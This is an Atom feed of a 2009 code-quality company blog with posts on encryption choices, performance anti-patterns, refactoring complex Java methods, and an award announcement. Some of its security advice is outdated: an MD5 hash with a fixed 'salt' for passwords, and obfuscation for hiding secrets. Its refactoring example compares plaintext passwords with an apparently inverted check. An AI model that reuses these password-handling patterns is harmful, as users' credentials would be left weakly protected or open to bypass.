   We present here various security issues poorly addressed in developments, but everyone must also understand the following assertion: &lt;strong&gt;any quality problem inside code is a potential security issue&lt;/strong&gt;. Some basic detections such as self-assignments (&lt;code&gt; someVar = someVar; &lt;/code&gt;), inverted conditions (&lt;code&gt; if (someValue.someMethod () &amp; &amp; (someValue! = null)) &lt;/code&gt;), infinite recursive calls, creation of unnecessary instances inside iterations, lack of verification of method result, etc.. are likely to create security issues:
&lt;/p&gt;
&lt;ul&gt;
   &lt;li&gt;unexpected behavior (validation of erroneous form data, wrong permissions added to users, confidential data displayed, ...)
   &lt;li&gt;application crash (lack of memory, execution stack full, ...)
&lt;/ul&gt;

&lt;p&gt;
   This article describes some quality rules having a direct impact on security. We start first part with the use of encryption algorithms.
&lt;/p&gt;

&lt;h2&gt;Encryption algorithms&lt;/h2&gt;
&lt;p&gt;
   The choice of an encryption algorithm is crucial. Firstly because it is often &lt;strong&gt;difficult to change algorithm&lt;/strong&gt; once it has been used in the application (for example, if you used to save your passwords with a MD5 checksum and want to move to SHA, you will not be able to check existing passwords as they will no longer be comparable).
&lt;/p&gt;

&lt;p&gt;
And on the other hand because it is obviously necessary to select a &lt;strong&gt;robust algorithm&lt;/strong&gt;. To avoid implementing some custom algorithms with suspicious reliability, projects often resort to standard algorithms whose specifications are public: MD5, AES, RSA, ... But two problems arise:
&lt;/p&gt;
&lt;ul&gt;
   &lt;li&gt;these algorithms have not an &lt;strong&gt;endless lifetime&lt;/strong&gt;! The evolution of computing power and the constant search for security holes make obsolete some algorithms yesterday considered as unbreakable. Developers must keep informed of the news. However broken algorithms such as DES (symmetric algorithm) or MD5 (fingerprint algorithm) are still numerous in code. Even if they are not always dangerous in the short-term (like MD5), you have to anticipate they could persist for several years in the project.
   &lt;li&gt;these algorithms must be &lt;strong&gt;configured&lt;/strong&gt;: key size, passwords, &lt;a href="http://en.wikipedia.org/wiki/Salt_%28cryptography%29"&gt;salt&lt;/a&gt;, padding, ... Again, some knowledge is needed to use these algorithms in a secure way. For example, storing passwords with a fingerprint algorithm (MD5, SHA ...) without using &lt;em&gt;salt&lt;/em&gt; to prevent from &lt;a href = "http://en.wikipedia.org/wiki/Rainbow_table"&gt;Rainbow-table&lt;/a&gt; attacks is a nonsense.
&lt;/ul&gt;

&lt;p&gt;
   &lt;strong&gt; Recommendations &lt;/strong&gt;:
&lt;/p&gt;
&lt;ul&gt;
   &lt;li&gt;&lt;strong&gt;Use algorithms up to date&lt;/strong&gt;. For example: &lt;strong&gt;SHA&lt;/strong&gt; for fingerprints, &lt;strong&gt;AES&lt;/strong&gt; for symmetric encryption or &lt;strong&gt;RSA&lt;/strong&gt; for asymmetric encryption.
   &lt;li&gt;Use keys with &lt;strong&gt;sufficient sizes&lt;/strong&gt;. For example &lt;strong&gt;128&lt;/strong&gt; for AES or &lt;strong&gt;2048&lt;/strong&gt; for RSA. See &lt;a href="http://en.wikipedia.org/wiki/Key_size"&gt;Wikipedia: Key size&lt;/a&gt;.
   &lt;li&gt;Take care of configuring the algorithms properly:
     &lt;ul&gt;
       &lt;li&gt;systematically add &lt;em&gt;salt&lt;/em&gt; inside fingerprints for confidential data (obviously not for identification data such as file checksums). For example: &lt;code&gt;md5("a fixed and original value" + somePassword)&lt;/code&gt;
       &lt;li&gt;use padding options, and good ones. For example, the &lt;a href="http://en.wikipedia.org/wiki/Optimal_Asymmetric_Encryption_Padding"&gt;OAEP padding&lt;/a&gt; with RSA (Java: &lt;code&gt;Cipher.getInstance( "RSA/ECB/OAEPPADDING)&lt;/code&gt;,  C#: &lt;code&gt;RSA.Encrypt(dataToEncrypt, true)&lt;/code&gt;)
     &lt;/ul&gt;
   &lt;/li&gt;
   &lt;li&gt;Hide passwords and &lt;em&gt;salts&lt;/em&gt;. Except when they may be requested interactively when starting application, they must necessarily be stored somewhere, so use the least accessible way: drowning in code (code obfuscation, dynamic generation, dispersal, .. .), encryption in external files (which requires then to store other passwords ...), ....
&lt;/ul&gt;

&lt;p&gt;
   &lt;strong&gt;To be continued...&lt;/strong&gt; In the next part, we will discuss issues related to concurrency and object encapsulation.
&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-5096630830478619386?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/5096630830478619386/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/11/empirical-overview-of-security.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/5096630830478619386?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/5096630830478619386?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/CIplS731TGg/empirical-overview-of-security.html" title="Empirical overview of security vulnerabilities [1/4]" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/11/empirical-overview-of-security.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEcNRX07eSp7ImA9WxNXF0k.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-2074624661000971881</id><published>2009-07-09T11:49:00.004+02:00</published><updated>2009-10-05T14:34:54.301+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-10-05T14:34:54.301+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="news" /><category scheme="http://www.blogger.com/atom/ns#" term="awards" /><title>Innovation Prize2009  from European Security and Information System Congress</title><content type="html">&lt;p style="height:60px"&gt;&lt;img src="http://www.lesassisesdelasecurite.com/portals/4/images/logos/logo_assises_fr.png" mce_src="http://www.lesassisesdelasecurite.com/portals/4/images/logos/logo_assises_fr.png" alt=" " align="left" width="233" height="59" /&gt;&lt;img src="http://www.lesassisesdelasecurite.com/Portals/4/Skins/Assises/images/new_prix_inovation.png" mce_src="http://www.lesassisesdelasecurite.com/Portals/4/Skins/Assises/images/new_prix_inovation.png" alt="Prix de l'Innovation" title="Prix de l'Innovation" align="right" width="189" height="59" /&gt;
&lt;/p&gt;

&lt;p&gt;
A new award in our trophy room: The &lt;a href="http://www.les-assises-de-la-securite.com/"&gt;2009 Innovation Price from the European Security and Information System Congress&lt;/a&gt; !
&lt;/p&gt;

&lt;p&gt;
This price is important due to its notoriety and to the jury's composition, composed by the security managers of several top firms (SNCF, BNP Paribas, SFR, etc...). It particularly delighted us by highlighting the Security dimension of our platform:
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
Firstly, it acknowledges our SaaS model as being innovative and perfectly adapted to the security needs of our customers. We worked very hard to guarantee the confidentiality of the code analyzed on our servers and our customers’ assessments have always been excellent. This price gives an additional answer :-)
&lt;/li&gt;
&lt;li&gt;
Secondly, it confirms our vision that security must be taken into account right at the beginning of the software development by continuously checking the source code to avoid bad practices that create vulnerabilities and to increase the security knowledge of the software development teams.
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;
The &lt;a href="http://www.lesassisesdelasecurite.com/Home.aspx"&gt;European Security and Information System Congress&lt;/a&gt; takes place in Monaco, from October 7th 2009 to October 10th 2009. We have a dedicated booth and we will be glad to present our solution.
&lt;/p&gt;

&lt;p&gt;
&lt;a href="http://www.lesassisesdelasecurite.com/Home/Prix/tabid/676/language/en-US/Default.aspx"&gt;Link to the Assises website &lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
&lt;a href="http://www.kalistick.com/index.php/english/Home.html"&gt;Link to the Kalistick website &lt;/a&gt;
&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-2074624661000971881?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/2074624661000971881/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/08/innovation-prize-from-assises-de-la.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/2074624661000971881?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/2074624661000971881?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/f0xSuH7TKE8/innovation-prize-from-assises-de-la.html" title="Innovation Prize2009  from European Security and Information System Congress" /><author><name>Charles Bompay</name><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/08/innovation-prize-from-assises-de-la.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUUESX4yeCp7ImA9WxNXF0k.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-8826280044863824790</id><published>2009-07-02T11:47:00.001+02:00</published><updated>2009-10-05T14:53:28.090+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-10-05T14:53:28.090+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="java" /><category scheme="http://www.blogger.com/atom/ns#" term="practice" /><category scheme="http://www.blogger.com/atom/ns#" term="c#" /><title>Statistical analysis of code to improve its performance</title><content type="html">&lt;p&gt;We recently published a &lt;a href="http://www.kalistick.fr/index.php/Societe/Actualites/La-Societe-Generale-ameliore-une-application-strategique.html"&gt;Société Générale testimonial&lt;/a&gt; that explained that the company had successfully reduced some of its processing time from &lt;strong&gt;20 minutes to 20 seconds&lt;/strong&gt; by using our &lt;a href="http://www.kalistick.com/index.php/english/Cockpit/"&gt;Quality Cockpit&lt;/a&gt; on one of its projects.&lt;/p&gt;  &lt;p&gt;Too much to be credible? Let's see how a statistical analysis of code helps to detect performance problems earlier, regardless of whether they are associated to the CPU or RAM.&lt;/p&gt;  &lt;h2&gt;One Example&lt;/h2&gt; &lt;p&gt; Here is the first example. It happens often, and it is very easy to follow:&lt;/p&gt;  &lt;pre name="code" class="java:nocontrols"&gt;User findUser(UserManager userManager, String id)
{
...
if (userManager.retrieveUser(id) != null)
{
 User user = userManager.retrieveUser(id);
 ...
}
...
}
&lt;/pre&gt;  &lt;p&gt; This is a typical example of the &lt;a href="http://en.wikipedia.org/wiki/Don%27t_repeat_yourself"&gt;DRY&lt;/a&gt; antipattern, whereby processing is repeated twice in the code. The developer might have thought that it would be too much to automatically declare the &lt;em&gt;user&lt;/em&gt; variable before the &lt;em&gt;if&lt;/em&gt; statement, or he simply did an inappropriate copy/paste. Perhaps he thought that the call to the &lt;em&gt;retrieveUser&lt;/em&gt; method would have a negligible load on the system. However, this code presents several problems: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;The developer might consult the code for the &lt;em&gt;retrieveUser&lt;/em&gt; method at an instant T, but he does not know what will happen to this method after implementation. For example, this implementation might use a high-performing memory cache at first and then change to a database lookup. Unnecessary calls that went unnoticed before may eventually impact performance. &lt;/li&gt;&lt;li&gt;Following the same principle, we cannot control where our procedure will be called. If the &lt;em&gt;findUser&lt;/em&gt; method is inefficient, it is not necessarily serious if it is called only once, such as when the user logs in. If the method comes to be called regularly, such as with each webpage that opens on a very active site, then its performance becomes critical. &lt;/li&gt;&lt;/ul&gt;  &lt;p&gt; This problem is common in object-oriented programming, the encapsulation principle. We can't focus on how a service is implemented, only on its contract (ex: a method's signature). This is especially true with the dependency injection mechanism (&lt;a href="http://en.wikipedia.org/wiki/Inversion_of_control"&gt;IOC&lt;/a&gt;). &lt;/p&gt; &lt;p&gt; This is one of the most common pitfalls in performance problems. A real problem might be hidden in less visible code for a while before becoming truly critical. That is why it is important to correct these problems as early as possible. &lt;/p&gt;  &lt;h2&gt;Some Recurring Causes&lt;/h2&gt; &lt;p&gt; In performance-related anomalies affecting our platform, we can identify some categories of recurring problems: &lt;/p&gt;  &lt;h3&gt;Poorly managed concurrent access&lt;/h3&gt; &lt;p&gt; Without even addressing the problem of &lt;a href="http://en.wikipedia.org/wiki/Deadlock"&gt;deadlocks&lt;/a&gt;, we regularly find unnecessary synchronizations. For example, instead of synchronizing on a field, the whole method is synchronized, which can slow down processing. This is also why we suggest having a rule to prohibit synchronizations at the method level so as to encourage developers to target and control their synchronizations better. &lt;/p&gt;  &lt;p&gt; Similarly, &lt;em&gt;thread-safe&lt;/em&gt; classes are sometimes used when their non-synchronized version should be used, which consumes less resources (ex: in Java, &lt;code&gt;java.util.ArrayList&lt;/code&gt; for a &lt;code&gt;java.util.Vector&lt;/code&gt;). &lt;/p&gt;  &lt;h3&gt;Poor memory management&lt;/h3&gt; &lt;p&gt; Just because a language has a &lt;a href="http://en.wikipedia.org/wiki/Garbage_collection_%28computer_science%29"&gt;garbage collector&lt;/a&gt; to automatically clean objects in memory, that doesn't mean that we don't need to pay attention to memory management.  &lt;/p&gt;  &lt;p&gt; First of all, there are often direct calls to the &lt;em&gt;garbage collector&lt;/em&gt;. This practice is not recommended because it can skew its internal algorithms and thereby reduce performance for the next cleanings. &lt;/p&gt;  &lt;p&gt;However, resources need to be freed up. This includes removing references to objects that are no longer being used and, for C#, managing &lt;em&gt;Disposable&lt;/em&gt; better, such as by releasing the &lt;em&gt;Disposable&lt;/em&gt; attributes in the finalizer or declaring classes with native attributes to be &lt;em&gt;Disposable&lt;/em&gt;. &lt;/p&gt;  &lt;p&gt; We also find bad practices related to unnecessary instantiations: &lt;/p&gt; &lt;ul&gt;&lt;li&gt;Declaration of non-static loggers. Generally, a logger object is associated with a class, and there is no need to create a specific instance for each of the class's objects. The logger should be declared as static. &lt;/li&gt;&lt;li&gt;Instantiations of objects that use only static methods   &lt;/li&gt;&lt;li&gt;Redundant instantiations in loops   &lt;/li&gt;&lt;li&gt;... &lt;/li&gt;&lt;/ul&gt;  &lt;h3&gt;Unnecessary code&lt;/h3&gt; &lt;p&gt; A simple way to improve performance is to track down unnecessary code: &lt;/p&gt; &lt;ul&gt;&lt;li&gt;Redundant casting &lt;pre class="brush:csharp"&gt;if (o is User)
handleUser(o as User);
&lt;/pre&gt; Since the C# &lt;em&gt;is&lt;/em&gt; operator is already casting implicitly.   &lt;/li&gt;&lt;li&gt;Instantiated, but unused variables (dead code)   &lt;/li&gt;&lt;li&gt;Writing to logs without checking the trace level &lt;pre class="brush:java"&gt;User findUser(UserManager userManager, String id)
{
User user = ...

List&lt;project&gt; projects = projectManager.findProjects(user);
LOGGER.debug("User found: " + user + ",available projects:" + projects);

return user;
}
&lt;/project&gt;&lt;/pre&gt; Here, a project list is returned only to be displayed in a debug log. This operation should only run if the application is in debug mode, so the applicable code should be surrounded by &lt;code&gt;if (LOGGER.isDebug())&lt;/code&gt;)   &lt;/li&gt;&lt;li&gt;Unnecessary tests &lt;pre class="brush:csharp"&gt;if (true)
{
...
}
&lt;/pre&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;h3&gt;Insufficient knowledge of the language&lt;/h3&gt; &lt;p&gt; Some performance problems are quite simply due to a lack of knowledge of the language and basic classes. Here are a few examples: &lt;/p&gt;  &lt;ul&gt;&lt;li&gt;In C#: &lt;code&gt;if (someString == "")&lt;/code&gt;. The test for an empty character string should be done with &lt;em&gt;System.String.IsNullOrEmpty(System.String)&lt;/em&gt;, which generates lighter IL code.   &lt;/li&gt;&lt;li&gt;In C#: &lt;code&gt;public static readonly Int32 someConstant=128&lt;/code&gt;. A constant should be declared with the keyword &lt;em&gt;const&lt;/em&gt;: &lt;code&gt;public const Int32 someConstant=128&lt;/code&gt;. The generated IL code will then use the constant value and will therefore perform better.   &lt;/li&gt;&lt;li&gt;In Java: &lt;code&gt;String s = new String("kalistick")&lt;/code&gt;. This automatically instantiates a new object, even though the JVM uses a character string cache because of &lt;code&gt;String s = "kalistick"&lt;/code&gt;.    &lt;/li&gt;&lt;li&gt;In Java: &lt;code&gt;Integer i = new Integer(args[0])&lt;/code&gt;. Same thing. Since Java 5, the JVM uses a cache of numeric values. This cache is invoked by writing &lt;code&gt;Integer i = Integer.valueOf(args[0])&lt;/code&gt;.    &lt;/li&gt;&lt;li&gt;In Java: &lt;code&gt;String s = "value = " + args[0]&lt;/code&gt;. A classic error that often comes from profiling. Character strings should always be concatenated using the &lt;code&gt;StringBuffer&lt;/code&gt; or &lt;code&gt;StringBuilder&lt;/code&gt; class (unless the concatenated terms are constants, in which case the compiler will optimize the concatenation). &lt;/li&gt;&lt;/ul&gt;    &lt;h2&gt;How to prevent performance problems&lt;/h2&gt; &lt;p&gt;Now that we've discussed some easily identifiable problems, the question is how to avoid them as early as possible. The first answer is to use trained and experienced developers! Every developer has the right to youthful indiscretions, but one would hope that they would only commit them once. :-) Training is key in our approach. The developer can find errors, document them in the best practices, and avoid reproducing them the same errors in the future. &lt;/p&gt;  &lt;p&gt; The second solution is to use a specialized tool to analyze performance: a &lt;em&gt;profiling&lt;/em&gt; tool. Such tools are designed to trace the execution of an application in order to provide a detailed view of its performance, whether in real time or afterwards, including CPU usage, memory used, threads, garbage collector activity, etc. A &lt;em&gt;drill-down&lt;/em&gt; mechanism is generally recommended for targeting the faulty code. Learning how to use them may not always be simple, but the challenge is in running the application with test scenarios that are exhaustive enough to cover all of the code to be tested. &lt;/p&gt;  &lt;p&gt; References: &lt;a href="http://www.ej-technologies.com/products/jprofiler/overview.html"&gt;JProfiler&lt;/a&gt; (Java), &lt;a href="http://www.yourkit.com/"&gt;YourKit&lt;/a&gt; (Java and C#), and &lt;a href="http://www.jetbrains.com/profiler/"&gt;dotTrace&lt;/a&gt; (C#). Java has its own version 6 of an integrated profiling tool: &lt;a href="http://java.sun.com/javase/6/docs/technotes/guides/visualvm/index.html"&gt;VisualVM&lt;/a&gt;. &lt;/p&gt;  &lt;h2&gt;Conclusion&lt;/h2&gt; &lt;p&gt;Statistical analysis is less productive and exact than a profiling session because it doesn't know the context of execution, but it can be used to quickly and easily identify obvious defects, particularly &lt;strong&gt;upstream of the problems&lt;/strong&gt;. And this is a key point to our approach: The earlier you correct problems, the less expensive it will be! &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-8826280044863824790?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/8826280044863824790/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/07/statistical-analysis-of-code-to-improve.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/8826280044863824790?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/8826280044863824790?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/bzzABpRJy7Y/statistical-analysis-of-code-to-improve.html" title="Statistical analysis of code to improve its performance" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/07/statistical-analysis-of-code-to-improve.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUYFRno7fSp7ImA9WxNXF0k.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-8087031267496841690</id><published>2009-05-19T11:46:00.001+02:00</published><updated>2009-10-05T14:51:57.405+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-10-05T14:51:57.405+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="java" /><category scheme="http://www.blogger.com/atom/ns#" term="practice" /><category scheme="http://www.blogger.com/atom/ns#" term="c#" /><title>Simplify your code</title><content type="html">&lt;p&gt; By examining the results of analyses on our customers' projects on our &lt;a href="http://www.kalistick.com/index.php/english/Cockpit/"&gt;Cockpit SaaS platform&lt;/a&gt;, it is clear that a &lt;em&gt;"Quick Win"&lt;/em&gt; strategy is often used for corrections. The team prioritizes glaring bugs (like floating point comparisons and synchronization problems) that are quick to correct (dead code, redundant casting, missing documentation headers, etc.). &lt;/p&gt;  &lt;p&gt;Among the anomalies that remain week after week, we generally find overly complex methods. This type of problem is often considered to be complicated and risky to resolve for a rather hypothetical benefit. By checking their dashboards on the Cockpit, development teams are aware of the problem and therefore improve new development projects, but pre-existing methods are rarely corrected. Let's consider the return on investment for this type of correction: the cost may be small, risks are controlled, and the benefits may be high. &lt;/p&gt;  &lt;h2&gt;Complex?&lt;/h2&gt; &lt;p&gt;By complex, we are referring to a method that is rather long or complicated in its algorithms. Theoretically, complexity is reflected in a &lt;strong&gt;high number of instructions&lt;/strong&gt; (typically &gt; 100, which equates to about 200-250 lines) or significant &lt;a href="http://en.wikipedia.org/wiki/Cyclomatic_complexity"&gt;cyclomatic complexity&lt;/a&gt; (typically &gt; 20). Based on our statistics, we find that about 4% of methods are highly complex methods in the projects we analyze for the first time, but this low percentage often represents &lt;strong&gt;10% to 20% of the application's total code&lt;/strong&gt; (depending on the project type and language)! Here is a typical example of how methods are distributed according to their cyclomatic complexity in a Java project: &lt;/p&gt; &lt;img style="margin: 0px auto 10px; display: block; text-align: center;" src="http://www.kalistick.fr/blog/res/2009/05/Chart-Complexite.png" alt="Chart of methods by complexity" width="469" height="355" /&gt;  &lt;p&gt; Another dimension that can add to the complexity of methods is the &lt;strong&gt;number of distinct dependencies&lt;/strong&gt; on external types/classes (the &lt;em&gt;efferent coupling&lt;/em&gt; concept). One method using many types in its processing is generally more difficult to understand and test. We will soon offer a new quality rule that includes this dimension in the Cockpit rules repository (this rule is currently being configured to set the different thresholds). &lt;/p&gt;  &lt;h2&gt;Why simplify these methods&lt;/h2&gt; &lt;p&gt;There are true challenges associated with simplifying a complex method. The objective is not just to come below the theoretical thresholds set by some quality manager or tool. &lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;strong&gt;Maintenance&lt;/strong&gt;: This is the most obvious reason. By definition, a complex method is &lt;strong&gt;difficult to understand and update&lt;/strong&gt;.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Testability&lt;/strong&gt;: A complex method generally cannot be properly unit tested. A unit test should check one process... a unit. Testing a method that combines several processes is like tasting several wines mixed in a single glass; it is difficult to draw reliable conclusions. This touches upon &lt;strong&gt;responsibility&lt;/strong&gt;, which is particularly important in object-oriented development.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Reusability&lt;/strong&gt;: It is more difficult to reuse a method that strings together different processes with varying specificity than to reuse unitary methods. Here again, this is a matter of &lt;em&gt;responsibility&lt;/em&gt;.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Extensibility&lt;/strong&gt;: With inheritance, it is preferable to overload unitary methods rather than to redefine a complex method altogether, avoiding having to copy code.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Automatic documentation&lt;/strong&gt;: Modern languages generally have standard documentation in the header comments for methods, and these comments can be used to automatically generate technical documentation. Breaking apart a method lets you transform informal internal comments into standard documentation, creating added value. In addition, the simple fact of &lt;strong&gt;naming&lt;/strong&gt; the new unitary methods helps to automatically document the code.&lt;/li&gt;&lt;/ul&gt;    &lt;h2&gt;Are there risks in simplifying a method?&lt;/h2&gt; &lt;p&gt; Common sense suggests that changing a complex method leads to a &lt;strong&gt;regression risk&lt;/strong&gt;. This is both because the process is difficult to understand and because it affects so many areas in regression. &lt;/p&gt;  &lt;p&gt; In many cases, however, &lt;strong&gt;using the right tools&lt;/strong&gt; can help to reduce risk or even remove it entirely. This is the principle of &lt;a href="http://fr.wikipedia.org/wiki/Refactorisation"&gt;refactoring&lt;/a&gt;. The program's structure is modified without impacting its behavior. &lt;/p&gt;  &lt;h2&gt;How do you simplify a complex method?&lt;/h2&gt; &lt;p&gt; There are two possible ways: manual refactoring and automatic refactoring. &lt;/p&gt;  &lt;h3&gt;Manual refactoring&lt;/h3&gt; &lt;p&gt; Let's consider the following method: &lt;/p&gt;  &lt;pre name="code" class="java:nocontrols"&gt;  public void addToProject(String input) throws InputException
{
 // Apply regexp to input string
 Matcher matcher = PATTERN.matcher(input);
 if (!matcher.matches())
   throw new InputException("Input does not match:" + input);

 // Retrieve user
 String idUser = matcher.group(1);
 User user = userService.findUser(idUser);
 if (user == null)
   throw new InputException("No user for ID:" + idUser);
 if (!user.isActive())
   return;
 String password = matcher.group(2);
 if (user.getPassword().equals(password))
   throw new InputException("Invalid password for user:" + idUser);

 // Retrieve project
 String idProject = matcher.group(3);
 Project project = projectService.findProject(idProject);
 if (project == null)
   throw new InputException("No project for ID:" + idProject);
 if (project.hasUser(user))
   return;

 // Add user to project
 project.addUser(user);
 projectService.saveProject(project);
}
&lt;/pre&gt;  &lt;p&gt; The purpose of this method is to add a user to a project after first checking the supplied information, and the parameters are encoded in a string. Four successive processes can easily be identified in this method: unencoding the input string, identifying the user, identifying the project, and associating the user to the project. Altogether, it might not seem complex, but imagine having to manage even more parameters or input controls. &lt;/p&gt;  &lt;p&gt;A good response would be to simplify this method by separating the user and project lookups into two distinct methods. This type of refactoring is generally referred to in the IDE as &lt;em&gt;Extract/Introduce method&lt;/em&gt;. But in this case, there are two recurring problems for this type of refactoring:  &lt;/p&gt;&lt;ol&gt;&lt;li&gt;     There are multiple &lt;strong&gt;output points&lt;/strong&gt; defined with different types: Boolean, objects &lt;em&gt;User&lt;/em&gt; or &lt;em&gt;Project&lt;/em&gt;, or &lt;em&gt;void&lt;/em&gt;.       &lt;/li&gt;&lt;li&gt;     &lt;strong&gt;Multiple variables are updated&lt;/strong&gt; in the externalized processes.    &lt;/li&gt;&lt;/ol&gt;  &lt;p&gt; The problem is that a Java or C# method can only return &lt;strong&gt;one type&lt;/strong&gt;. The second problem can sometimes be resolved by passing variables in as parameters, but this only works if the variables can truly be passed by reference, which is not possible with scalar types or strings, for example. &lt;/p&gt;  &lt;p&gt; At least two solutions can resolve this gracefully. Both require introducing an object that encapsulates the different variables that might be updated. These are based on known refactoring, as popularized by &lt;a href="http://www.amazon.fr/Refactoring-Improving-Design-Existing-Code/dp/toc/0201485672"&gt;Martin Fowler&lt;/a&gt;. &lt;/p&gt;  &lt;h4&gt;Introduce Parameter Object + Extract Method&lt;/h4&gt; &lt;p&gt; This solution involves &lt;strong&gt;regrouping the variables&lt;/strong&gt; used for input and output into a new object and then passing the object from method to method. The new object generally contains only attributes. In C#, this is typically implemented with a private class, and in Java, a private static class is used (preferably with comments ;-) ): &lt;/p&gt;  &lt;pre name="code" class="java:nocontrols"&gt;  private final static class InputContext
{
 private Matcher matcher;
 private User user;
 private Project project;

 private InputContext(Matcher matcher)
 {
   this.matcher = matcher;
 }

 public Matcher getMatcher()
 {
   return matcher;
 }

 public void setMatcher(Matcher matcher)
 {
   this.matcher = matcher;
 }

 public User getUser()
 {
   return user;
 }

 public void setUser(User user)
 {
   this.user = user;
 }

 public Project getProject()
 {
   return project;
 }

 public void setProject(Project project)
 {
   this.project = project;
 }
}
&lt;/pre&gt;  &lt;p&gt; Traditional refactoring, &lt;em&gt;Extract Method&lt;/em&gt;, can also be used as normal: &lt;/p&gt;  &lt;pre name="code" class="java:nocontrols"&gt;  public void addToProject(String input) throws InputException
{
 // Apply regexp to input string
 Matcher matcher = PATTERN.matcher(input);
 if (!matcher.matches())
   throw new InputException("Input does not match:" + input);

 InputContext inputContext = new InputContext(matcher);

 // Fill context with user &amp;amp; project
 if (!retrieveUser(inputContext))
   return;
 if (!retrieveProject(inputContext))
   return;

 // Add user to project
 Project project = inputContext.getProject();
 project.addUser(inputContext.getUser());
 projectService.saveProject(project);
}

protected boolean retrieveUser(InputContext inputContext) throws InputException
{
 String idUser = inputContext.getMatcher().group(1);
 User user = userService.findUser(idUser);
 if (user == null)
   throw new InputException("No user for ID:" + idUser);
 if (!user.isActive())
   return false;
 String password = inputContext.getMatcher().group(2);
 if (user.getPassword().equals(password))
   throw new InputException("Invalid password for user:" + idUser);

 inputContext.setUser(user);

 return true;
}

protected boolean retrieveProject(InputContext inputContext) throws InputException
{
 String idProject = inputContext.getMatcher().group(3);
 Project project = projectService.findProject(idProject);
 if (project == null)
   throw new InputException("No project for ID:" + idProject);
 if (project.hasUser(inputContext.getUser()))
   return false;

 inputContext.setProject(project );

 return true;
}
&lt;/pre&gt;  &lt;p&gt; In addition to simplifying maintenance, we see that externalized processing can be &lt;strong&gt;easily overloaded by inheritance&lt;/strong&gt;. &lt;/p&gt;  &lt;h4&gt;Replace Method with Method Object&lt;/h4&gt; This refactoring builds upon the concept of encapsulation by introducing externalized methods &lt;strong&gt;into the new object's class&lt;/strong&gt;. The object paradigm calls for data and associated processing to be grouped into coherent, autonomous entities. Both solutions are relevant. You can decide whether you prefer to separate or group together data and processing. The same choice can be found in the debate over &lt;a href="http://en.wikipedia.org/wiki/Active_record_pattern"&gt;Active Record&lt;/a&gt; versus &lt;a href="http://en.wikipedia.org/wiki/Data_access_object"&gt;DAO&lt;/a&gt;.  &lt;h3&gt;Automatic refactoring&lt;/h3&gt; &lt;p&gt; There are obviously regression risks involved with manual refactoring. Fortunately, IDEs are quite advanced in this area. Traditional refactoring, such as renaming, moving, and introducing variables, has existed for a long time. More recently, more advanced refactoring has become available. &lt;a href="http://www.jetbrains.com/idea/"&gt;IntellijIDEA&lt;/a&gt; offers &lt;em&gt;Replace Method with Method Object&lt;/em&gt; refactoring (under the name &lt;a href="http://www.jetbrains.com/idea/features/refactoring.html#Extract_Method_Object"&gt;Extract Method Object&lt;/a&gt;). &lt;/p&gt; &lt;p&gt; Simply select the block of instructions to 